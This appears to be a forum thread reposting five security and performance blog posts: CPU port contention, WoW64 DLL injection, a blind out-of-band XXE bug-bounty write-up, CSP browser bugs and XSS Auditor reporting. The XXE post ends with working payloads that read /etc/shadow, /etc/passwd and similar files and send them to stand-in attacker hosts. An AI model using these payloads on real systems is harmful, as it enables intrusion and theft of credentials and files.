The results above show that in each of the 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (the last 2 loads + the dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling one in parallel with 2 loads.
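The throughput argument above can be condensed into a one-line model. Since every port is fully pipelined (it can start a new uop each cycle), the steady-state cycles per iteration is simply the uop count of the busiest port; latency only delays the first results, not the issue cadence. A hypothetical sketch of that reasoning in Python (the helper is mine, not a real scheduler model):

```python
def cycles_per_iteration(uops_per_port):
    """Steady-state cycles per loop iteration for fully pipelined ports.

    `uops_per_port` maps a port name to the number of uops one loop
    iteration sends to that port. Each port can start one uop per
    cycle, so the most heavily loaded port dictates the throughput.
    """
    return max(uops_per_port.values())

# 16 loads split evenly across ports 2 and 3, plus the macro-fused
# dec/jnz pair on port 5 -- matching the measured ~8 cycles/iteration.
loop_uops = {"PORT2": 8, "PORT3": 8, "PORT5": 1}
print(cycles_per_iteration(loop_uops))  # 8
```

This deliberately ignores front-end limits and dependencies, but it predicts the later bswap experiments the same way: whichever port receives the most uops per iteration sets the cycle count.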
What is even more interesting is that if we do the simulation with the assumption that a load instruction takes 4 cycles latency, all the conclusions in this example remain valid, because the throughput is what matters (as Travis mentioned in his comment). There will still be 2 retired load instructions each cycle, which means that our 16 loads (inside each iteration) will retire in 8 cycles.

Utilizing other available ports in parallel

In the example I presented, I'm only utilizing PORT2 and PORT3, and partially PORT5. What does that mean? Well, it means that we can schedule instructions on other ports in parallel with the loads, just for free. Let's try to write such an example. After each pair of loads I added one bswap instruction. This instruction reverses the byte order of a register; it is very helpful for doing big-endian to little-endian conversion and vice versa. There is nothing special about this instruction, I just chose it because it suits my experiments best. According to Agner's instruction_tables.pdf, a bswap on a 32-bit register is executed on PORT1 and has 1 cycle latency.
max load capacity + 1 bswap
; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
bswap ebx
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
bswap ebx
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
bswap ebx
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
bswap ebx
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
bswap ebx
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
bswap ebx
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
bswap ebx
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
bswap ebx
dec edi
jnz .loop

Here are the results for this experiment:

Benchmark                    Cycles  UOPS.PORT1  UOPS.PORT2  UOPS.PORT3  UOPS.PORT5
max load capacity + 1 bswap  8.03    8.00        8.01        8.01        1.00

The first observation is that we get 8 bswap instructions for free (we are still running at 8 cycles per iteration), because they do not contend with the load instructions. Let's look at the pipeline diagram for this case: we can see that all the bswap instructions fit nicely into the pipeline, causing no hazards.

Overutilizing ports

Modern compilers try to schedule instructions for a particular target architecture to fully utilize all execution ports. But what happens when we schedule too many instructions for one execution port? Let's see.
I added one more bswap instruction after each pair of loads:

port 1 throughput bottleneck
; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
bswap ebx
bswap ecx
dec edi
jnz .loop

When I measured this with the uarch-bench tool, here is what I received:

Benchmark                     Cycles  UOPS.PORT1  UOPS.PORT2  UOPS.PORT3  UOPS.PORT5
port 1 throughput bottleneck  16.00   16.00       8.01        8.01        1.00

To understand why we now run at 16 cycles per iteration, it's best to look at the pipeline diagram again. Now it's clear that we have 16 bswap instructions and only one port that can handle this kind of instruction. So we can't go faster than 16 cycles in this case, because the IVB processor executes them sequentially. Different architectures might have more ports that can handle bswap instructions, which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know the limitations of your hardware!

Additional resources

More detailed information about the execution ports of your processor can be found in Agner's microarchitecture.pdf and, for Intel processors, in Intel's optimization manual. All the assembly examples that I showed in this article are available on my github.

UPD 23.03.2018

Several people mentioned that load instructions can't have 2 cycles latency on modern Intel architectures. Agner's tables seem to be inaccurate there.
I will not redo the diagrams, as that would make them difficult to understand and would shift the focus from the actual thing I wanted to explain. Again, I didn't want to reconstruct how the pipeline diagram would look in reality, but rather to explain the notion of port contention. However, I fully accept the comment and it should be mentioned. Even if we assume that a load instruction takes 4 cycles latency in those examples, all the conclusions in the post are still valid, because the throughput is what matters (as Travis mentioned in his comment). There will still be 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution "slots". See more details in the HackerNews comments. Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
-
DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. 
All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. 
Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32.

Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll

The main advantage of this method lies in its sheer simplicity: all it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method. First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it's not there by default. Second, this method provides little to no control over the injection process, as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc.

Heaven's Gate

More control over the injection process can be achieved by simply issuing the call to LdrLoadDll() ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages:

Gain the ability to execute arbitrary 32-bit code inside the target process.
Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments.
Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. 
Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. 
Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification:

Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h

As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other "context" parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure:

The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process, so using LoadLibrary() and its variants is not possible.
The path to the DLL we wish to load into the process.

Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments:

Figure 6 – A typical "adapter thunk" set as the target of a user-mode APC

To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A). This approach seemed promising, but when we attempted to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error.

Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk

Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle.

Appendixes

Appendix A – complete source code for APC injection with adapter thunk

Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
-
Posted on March 24, 2018 by tghawkins

Today, I'd like to share my methodology behind how I found a blind, out-of-band XML external entities (XXE) attack in a private bug bounty program. I have redacted the necessary information to hide the program's identity. As with the beginning of any hunter's quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able to discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page:

I noticed in the response the XML content type, along with an XML body containing SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200. Since the web application seemed to be responding well to the POST request, instead of issuing a 405 Method Not Allowed error, I decided to issue a request containing XML syntax with the content type application/xml. The resulting response was also different than in the previous cases. This response was also in XML, as it was when issuing the GET request to this endpoint. However, this time, within the tags is the value "OK" instead of the original value "TestRequestCalled". I also tried to send a JSON request to see how the application would respond. Below is the result.

Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to set up my VPS to host a DTD file for the XML processor to "hopefully" parse. Below is the result of the DTD being successfully processed, with the requested file contents appended.
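For reference, the attacker side of a blind, out-of-band XXE probe like this boils down to two small text files: the XML body that pulls in a remote DTD, and the DTD itself, which reads a local file and leaks it in a callback URL. A minimal Python sketch that generates both pieces is below; the host, port, and target file are placeholders, and the helper function is my own illustration, not a tool used in the original test:

```python
def build_oob_xxe(attacker_host, target_file="/etc/hostname"):
    """Build the XML request body and the external DTD for a blind,
    out-of-band XXE probe. The DTD is hosted on the attacker's server;
    the leaked file contents come back as a query string in the callback.
    """
    request_body = (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE r [\n"
        "<!ELEMENT r ANY >\n"
        f'<!ENTITY % sp SYSTEM "http://{attacker_host}/ev.xml">\n'
        "%sp;\n"
        "%param1;\n"
        "]>\n"
        "<r>&exfil;</r>\n"
    )
    # Contents of ev.xml, served from the attacker's host:
    external_dtd = (
        f'<!ENTITY % data SYSTEM "file://{target_file}">\n'
        '<!ENTITY % param1 "<!ENTITY exfil SYSTEM '
        f"'http://{attacker_host}/?%data;'\">\n"
    )
    return request_body, external_dtd

body, dtd = build_oob_xxe("x.x.x.x:443")
print(body)
print(dtd)
```

The request body is what gets POSTed to the vulnerable endpoint; the second string is written to ev.xml on the listening server, and the file contents arrive in the server's access log.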
I also used this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb to set up an FTP server and have it listening, so I would also be able to extract the server's information/file contents through the FTP protocol.

Although this submission was marked as a duplicate, I wanted to share this finding, as it was a good learning experience and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue.

Some helpful XXE payloads:

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>

## External dtd: ##
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'>
%param1;
%external;

-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: %

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
-
Stefan Matsson 2018-03-26 # Security

CSP IMPLEMENTATIONS ARE BROKEN

TL;DR

frame-src is inconsistent cross-browser
block-all-mixed-content is broken in Chrome and Opera
CSP reports are inconsistent
Edge has some weird edge cases (no pun intended)

INTRO

There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and forced the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue, as it contains rules for what the browser may and may not load. Read more at https://content-security-policy.com

I recently held a talk with the title "Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it". This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot.

SOME INFO ON THE SYSTEM WE ARE BUILDING

My client provides payment services for e-commerce. The system is loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let's call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literally hundreds of trusted providers all over the world, and each of these has its own page that must be loaded in the iframe. I will not go into more detail, to avoid revealing too much information about my client.

FRAME-SRC IS INCONSISTENT CROSS BROWSER

If your CSP contains a frame-src that does not include mailto: or tel:, these links will be blocked inside the iframe except in Firefox and Edge.
Firefox will open both links, and Edge will open the mailto link but block the tel link. I'm not really sure if it's broken in Firefox or in the other browsers; there are valid arguments for both cases.

Workaround: Add mailto: and tel: to your CSP: frame-src 'self' mailto: tel:

I have reported this to Microsoft but have not heard back.

Affected browsers: Firefox and Edge, or all others, depending on your point of view
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/

EDGE AND CUSTOM ERROR PAGES

We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to, we currently use this frame-src in our CSP: frame-src 'self' data: https:

The issue with Edge is that it loads custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc.). The error page is loaded via an ms-appx-web:// URL (e.g. ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP, and a blank page is displayed to the user. The result is that our service provider's iframe is just blank if an error occurs. I reported this issue to Microsoft in early March but have not heard anything back from them.

Workaround: Add ms-appx-web: to our frame-src: frame-src 'self' data: https: ms-appx-web:

Affected browsers: Edge
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/

EDGE AND EXTENSIONS

Extensions installed in Edge are subject to the current page's content security policy. Basically, all installed extensions that try to do anything, from loading images to JS, will fail, and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released, according to the Edge issue tracker (issue 1132012).
Affected browsers: Edge

BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE

If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user clicks a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors:

Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS.
Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS.

This issue has been reported to Google and Opera. Opera has not yet responded.

Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead)

Affected browsers: Chrome and Opera
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/

SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2

"Older" in this case means iOS 9 or earlier; Safari on iOS 10 and 11 does support CSP2. Since we require the use of script hashes, we also require CSP2. Desktop Safari is also affected, but that is not as big of a problem, as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop.

Workaround: There is no way to make this work, so we have disabled CSP for older iOS devices using user agent sniffing.

Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop

INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1

IE11 supports CSP1 via the X-Content-Security-Policy header.
If you wish to support IE11, you need to either do some user agent sniffing and change the header name from Content-Security-Policy to X-Content-Security-Policy, or send out both headers to everyone. In our case we barely have any customers on IE11, so we just send out the regular Content-Security-Policy header, which is then ignored by IE11.

Affected browsers: Internet Explorer 11 (older versions do not support CSP)

CSP REPORTS DIFFER BETWEEN BROWSERS

The reports sent to your report-uri should follow a common standard defined in the CSP spec, but browsers differ on what data they send. Some versions of Safari include the entire CSP in the violated-directive property. This is like saying "Something went wrong. You find out what and deal with it." Chrome on Android sometimes does not provide a blocked-uri when the violated-directive is frame-src, which means we have no way of knowing what URL was blocked in the iframe. Most browsers do not provide a script-sample when an inline script is blocked; script-sample is very helpful in debugging what script was blocked.

CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES

This is primarily due to browser extensions. Most extensions work by injecting code into the page, and code on the page is subject to the page's CSP. A common issue we have found in our logs is violated-directive: script-src with blocked-uri: about:blank, which is caused by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank.

SUMMARY

Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site.

Source: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
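As a footnote on the IE11 workaround: the user-agent sniffing boils down to picking a header name per request. A minimal sketch, assuming a crude Trident/MSIE token check is acceptable (the helper name and UA strings are illustrative, not the client's actual code):

```python
def csp_header_name(user_agent: str) -> str:
    """Pick the CSP response header name from a crude user-agent check.

    IE11 only understands the prefixed X-Content-Security-Policy header
    (and only CSP1 features), so everything else gets the standard name.
    """
    # "Trident/7.0" is the IE11 engine token; "MSIE" covers older IE versions.
    if "Trident/7.0" in user_agent or "MSIE" in user_agent:
        return "X-Content-Security-Policy"
    return "Content-Security-Policy"

# Example: an IE11 user agent vs. a modern Chrome one.
ie11 = "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
chrome = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/65.0 Safari/537.36"
print(csp_header_name(ie11))    # X-Content-Security-Policy
print(csp_header_name(chrome))  # Content-Security-Policy
```

Sending both headers to everyone, as the post mentions, avoids the sniffing entirely at the cost of a few extra bytes per response.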
-
Introducing XSS Auditor reporting to Report URI
March 26, 2018

Whilst we already have support for CSP reports over at Report URI, there is another potential source of information about XSS attacks that may be attempted or happening on your site. The X-XSS-Protection header allows you to configure the XSS Auditor, decide what action it should take, and request that the Auditor send reports if action is required. We now support XSS Auditor reporting on Report URI!

The XSS Auditor

The XSS Auditor runs whilst HTML is being parsed and attempts to find reflected XSS attacks against the user. If it finds a possible attack, the Auditor can take no action, it can filter what it thinks is the attack payload, or it can refuse to render the page at all. The XSS Auditor is present in Chromium and WebKit, so a good share of browsers have one.

Configuring the Auditor

The default configuration of the XSS Auditor varies depending on which version of which browser you're using, of course, but configuring it is easy enough. You can control the Auditor with the X-Xss-Protection header using a few simple values. You can read more detail about configuring the Auditor in my blog post Hardening your HTTP response headers, and you can test whether your site, or any other site, has it deployed properly using securityheaders.io. No matter which configuration you use, as long as you have the Auditor enabled, it can send reports about the action it takes.

X-Xss-Protection: 1; mode=block; report=https://{subdomain}.report-uri.com/r/d/xss/enforce

XSS Reports

Whilst the original purpose of CSP was to defend against XSS attacks, and it can do that very successfully, if you have both CSP and XXP (X-Xss-Protection) deployed you can benefit from an even better level of protection. There's no reason to think you don't need one if you have the other; leverage the protection of both!
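Deploying both protections is just a matter of emitting two response headers. A minimal sketch using Python's standard WSGI machinery (the policy value and the report subdomain are placeholders, not Report URI's recommended configuration):

```python
from wsgiref.simple_server import make_server

# Placeholder report endpoint; a real deployment would use its own subdomain.
REPORT_URL = "https://example.report-uri.com/r/d/xss/enforce"

def app(environ, start_response):
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        # CSP as the primary defence against injected content...
        ("Content-Security-Policy", "default-src 'self'"),
        # ...and the XSS Auditor as an extra layer, reporting what it blocks.
        ("X-Xss-Protection", f"1; mode=block; report={REPORT_URL}"),
    ]
    start_response("200 OK", headers)
    return [b"<h1>hello</h1>"]

# make_server("", 8000, app).serve_forever()  # uncomment to actually serve
```

The two headers are independent, so either can be rolled out first and tightened later without touching the other.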
Whether or not you have CSP deployed, you can deploy XXP and have the Auditor stop attacks before they even take place. If CSP is the last line of defence in the browser, then XXP is an additional, penultimate line of defence. With the Auditor configured, if it sees any kind of reflected XSS attack on your site it will send a report that looks like this:

{"xss-report": {
    "request-url": "https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E",
    "request-body": ""
}}

This is a great report to receive and it will tip you off about a likely issue on one of your pages. The good thing about the report is that it won't be sent if the browser doesn't find the content of the GET parameter reflected somewhere in the page, so the false positive rate should be fairly low. You might see some novel attacks against your users, find some nifty XSS payloads, or just rest assured knowing that if the browser thinks there's a problem then it will tell you. Deploy it alongside CSP, before CSP or after CSP, it doesn't really matter, but it's available now and you should go check it out.

Support

The XSS Auditor can send reports from Chromium- and WebKit-based browsers, which gives us a pretty high level of visibility. WebKit will happily send those reports right now, but Chrome has a small interruption in service at present. You can read more in the Chromium bug, but Chrome will begin sending reports again during April, so we will be back on track there. The great thing about reporting mechanisms like this is that we can still get value from the feature even without 100% browser support. There are a lot of WebKit browsers out there and they may be able to tell you something useful.

Other Updates

We've also released a few other features here and there over the last couple of months, so I wanted to detail those too.
The list is far from exhaustive, but here's a few:

- When filtering your reports on the Reports page, the filter is now reflected into the URL. This means you can bookmark/share/save filters for more convenient use in the future. Back/forward navigation also works as expected.
- After the recent update that introduced wildcard queries in the hostname and path fields, we've also introduced a 'not' filter that does exactly what you'd expect.
- We've made some improvements to our filtering for inbound reports. There's now less noise making it through to your account, and we have special handling in place for a few browser bugs, so reports will make more sense overall.
- There have been countless UI tweaks and improvements to make the browsing experience better, including series highlighting and toggling on the graphs page, better sorting on the Reports tables, Team invite emails, performance improvements and much more!

After launching XSS Auditor Reporting today we've started our 7 day countdown to our next feature launch, which is going to be a big one. I'm really excited about the launch next week and I'm hoping everyone will love the new feature as much as we do!

Source: https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/
